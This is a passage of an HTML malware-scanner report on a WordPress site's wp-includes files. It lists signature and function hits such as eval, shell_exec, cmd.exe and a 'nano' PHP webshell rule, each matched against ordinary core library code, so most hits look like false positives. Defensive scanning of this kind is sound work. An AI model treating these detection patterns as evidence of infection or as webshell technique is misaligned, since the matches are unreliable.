</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_96").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/ID3/module.audio-video.quicktime.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 137.50 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_97" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">riny</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_97").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/pluggable.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 96.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:02</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_98" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exploit</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_98").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/sodium_compat/src/Crypto32.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 38.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_99" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZEROBYTE</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_99").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/sodium_compat/src/Crypto.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 38.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_100" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZEROBYTE</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_100").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/sodium_compat/src/File.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.55 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_101" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 857</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZEROBYTE</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_101").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/class-phpmailer.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 143.34 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_102" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_102").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/class-snoopy.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 36.90 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_103" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">curl_path&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$cmdline_params&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">escapeshellarg</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$URI&nbsp;</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">$results</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$return&nbsp;</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$return</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">error&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"Error:&nbsp;cURL&nbsp;could&nbsp;not&nbsp;retrieve&nbsp;the&nbsp;document,&nbsp;error&nbsp;</span><span style="color: #0000BB">$return</span><span style="color: #DD0000">."</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$results&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">,</span><span style="color: #0000BB">$results</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$result_headers&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">file</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$headerfile</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_redirectaddr&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;unset(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">headers</span><span style="color: #007700">);&nbsp;for(</span><span style="color: #0000BB">$currentHeader&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$currentHeader&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$result_headers</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$currentHeader</span><span style="color: #007700">++)&nbsp;{&nbsp;if(</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">"/^(Location:&nbsp;|URI:&nbsp;)/i"</span><span style="color: #007700">,</span><span style="color: #0000BB">$result_headers</span><span style="color: #007700">[</span><span style="color: #0000BB">$currentHeader</span><span style="color: #007700">]))&nbsp;{&nbsp;</span><span style="color: #0000BB">pre</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_103").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/SimplePie/Parse/Date.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.24 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:02</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_104" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 787</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$day&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$fws&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$month&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$fws&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$year&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$fws&nbsp;</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_104").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/class-requests.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 29.09 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:02</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_105" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 190</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$transport</span><span style="color: #007700">[</span><span style="color: #0000BB">$cap_string</span><span style="color: #007700">]()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_105").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/Text/Diff.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.65 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_106" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function assert <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `assert`</p><p><i>[<a href="https://www.php.net/assert" target="_blank" class="text-primary">https://www.php.net/assert</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$mapped_from_lines</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$mapped_to_lines</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">parent</span><span style="color: #007700">::</span><span style="color: #0000BB">Text_Diff</span><span style="color: #007700">(</span><span style="color: #0000BB">$mapped_from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$mapped_to_lines</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;for&nbsp;(</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_edits</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$i</span><span style="color: #007700">++)&nbsp;{&nbsp;</span><span style="color: #0000BB">$orig&nbsp;</span><span style="color: #007700">=&nbsp;&amp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_edits</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">]-&gt;</span><span style="color: #0000BB">orig</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$orig</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$orig&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$xi</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$orig</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">+=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$orig</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$final&nbsp;</span><span style="color: #007700">=&nbsp;&amp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_edits</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">]-&gt;</span><span style="color: #0000BB">final</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$final</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$final&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$yi</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$final</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">+=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$final</span><span style="color: #007700">);&nbsp;}&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_106").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/Text/Diff/Engine/shell.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.09 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span><br><table id="file_107" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function assert <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `assert`</p><p><i>[<a href="https://www.php.net/assert" target="_blank" class="text-primary">https://www.php.net/assert</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #DD0000">'$match[1]&nbsp;-&nbsp;$from_line_no&nbsp;==&nbsp;$match[4]&nbsp;-&nbsp;$to_line_no'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">array_push</span><span style="color: #007700">(</span><span style="color: #0000BB">$edits</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_copy</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$to_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">4</span><span style="color: #007700">]&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">)));&nbsp;}&nbsp;switch&nbsp;(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">])&nbsp;{&nbsp;case&nbsp;</span><span style="color: #DD0000">'d'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">array_push</span><span style="color: #007700">(</span><span style="color: #0000BB">$edits</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_delete</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])));&nbsp;</span><span style="color: #0000BB">$to_line_no</span><span style="color: #007700">++;&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">'c'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">array_push</span><span style="color: #007700">(</span><span style="color: #0000BB">$edits</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_change</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]),&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_diffCommand&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$from_file&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$to_file</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">unlink</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_file</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">unlink</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_file</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_null</span><span style="color: #007700">(</span><span style="color: #0000BB">$diff</span><span style="color: #007700">))&nbsp;{&nbsp;return&nbsp;array(new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">));&nbsp;}&nbsp;</span><span style="color: #0000BB">$from_line_no&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$to_line_no&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$edits&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;</span><span style="color: #0000BB">preg_match_all</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$diff</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$matches</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">PREG_SET_ORDER</span><span style="color: #007700">);&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">$matches&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!isset(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">5</span><span style="color: #007700">]))&nbsp;{&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">5</span><span style="color: #007700">]&nbsp;=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]&nbsp;==&nbsp;</span><span style="color: #DD0000">'a'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">--;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]&nbsp;==&nbsp;</span><span style="color: #DD0000">'d'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$to_line_no</span><span style="color: #007700">--;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$fr</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_107").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-includes/Text/Diff/Engine/native.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:46</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_108" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function assert <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `assert`</p><p><i>[<a href="https://www.php.net/assert" target="_blank" class="text-primary">https://www.php.net/assert</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_to&nbsp;</span><span style="color: #007700">||&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">xchanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">]);&nbsp;</span><span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_from&nbsp;</span><span style="color: #007700">||&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ychanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">]);&nbsp;</span><span style="color: #0000BB">$copy&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;while&nbsp;(</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_from&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_to&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;!</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">xchanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: 